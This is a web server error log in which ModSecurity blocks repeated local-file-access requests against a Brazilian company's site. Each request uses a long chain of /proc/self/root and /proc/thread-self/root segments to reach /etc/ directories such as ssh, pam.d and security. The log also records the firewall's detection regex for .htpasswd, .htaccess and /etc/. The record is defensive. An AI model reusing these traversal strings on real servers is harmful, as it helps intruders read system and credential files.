[Fri Mar 20 03:07:08.308577 2026] [:error] [pid 8307:tid 140411607643904] [client 74.7.241.31:46590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkDL-FhjpZGs9ba8quXQAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:07:17.129821 2026] [proxy_fcgi:error] [pid 21219:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42276] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:07:17.886999 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.241.31:43500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkFfXLqtnMIWvjpaJiXwAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:07:19.842122 2026] [core:alert] [pid 7893:tid 140411683178240] [client 57.141.18.19:48596] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:07:24.699150 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:43512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkHPXLqtnMIWvjpaJiZwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:07:30.556415 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:43164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkIvXLqtnMIWvjpaJicAAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:07:37.675592 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:54428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkKQkwaGbbGflqUZAOaQAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:07:39.149806 2026] [proxy_fcgi:error] [pid 31215:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43142] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:07:43.731193 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:54442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkL9a6ubjKNq_cu4aYmgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:07:46.838662 2026] [mime_magic:error] [pid 7893:tid 140411641214720] (70014)End of file found: [client 66.249.74.169:41727] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:07:48.582852 2026] [core:alert] [pid 30077:tid 140411691570944] [client 57.141.18.110:49762] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:07:48.735045 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:36586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkNOoXxyEfFpUF8f9N8wAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:07:49.567075 2026] [:error] [pid 30424:tid 140411708356352] [client 74.7.243.128:60746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkNct36Dv4L1GW-s-hwgAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:07:53.402364 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:36598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkOBCii7xarUs8iHYtnQAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:07:59.778838 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:56276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkPRCii7xarUs8iHYtpQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:08:02.460226 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:34296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkQvqxLDW4GITHUkSsqwAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:02.577779 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43968] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:08:04.520907 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:56284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkRBCii7xarUs8iHYtqQAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:05.103846 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:56284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkRRCii7xarUs8iHYtqgAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:06.935600 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:50948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkRgkwaGbbGflqUZAOhQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:08.943079 2026] [:error] [pid 30424:tid 140411683178240] [client 74.7.241.31:52736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkSMt36Dv4L1GW-s-hzAAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:09.441912 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:50948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkSQkwaGbbGflqUZAOiAAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:12.155870 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.241.31:52744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkTPXLqtnMIWvjpaJimgAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:15.287660 2026] [:error] [pid 30424:tid 140411607643904] [client 74.7.241.31:52754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkT8t36Dv4L1GW-s-h0QAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:19.066497 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:37516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkUwkwaGbbGflqUZAOjQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:08:19.592401 2026] [:error] [pid 8307:tid 140411582465792] [client 74.7.243.128:52558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkU7-FhjpZGs9ba8qusAAAAxM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:08:24.123174 2026] [proxy_fcgi:error] [pid 21219:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44822] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:08:24.183846 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:37532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkWPu8EFLIOrSqIpvo0QAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
